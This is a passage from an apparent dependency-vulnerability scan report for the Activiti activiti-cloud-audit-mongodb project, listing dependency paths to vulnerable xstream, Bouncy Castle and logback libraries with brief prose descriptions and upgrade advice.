Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.7, 1.4.11 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Cryptographic Issues via weak key-hash message authentication code (HMAC) that is only 16 bits long which can result in hash collisions, as a result of an error within the BKS version 1 keystore (BKS-V1) files and could lead to an attacker being able to affect the integrity of these files. This vulnerability was introduced following an incomplete fix for CVE-2018-5382.
Remediation
Upgrade org.bouncycastle:bcprov-jdk15on to version 1.69 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Information Exposure due to missing validation for the X.500 name of any certificate, subject, or issuer. The presence of a wild card may lead to information disclosure. This could allow a malicious user to obtain unauthorized information via blind LDAP Injection, exploring the environment and enumerating data.
Note:
The exploit depends on the structure of the target LDAP directory as well as what kind of errors are exposed to the user.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
- Module: ch.qos.logback:logback-classic
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
-
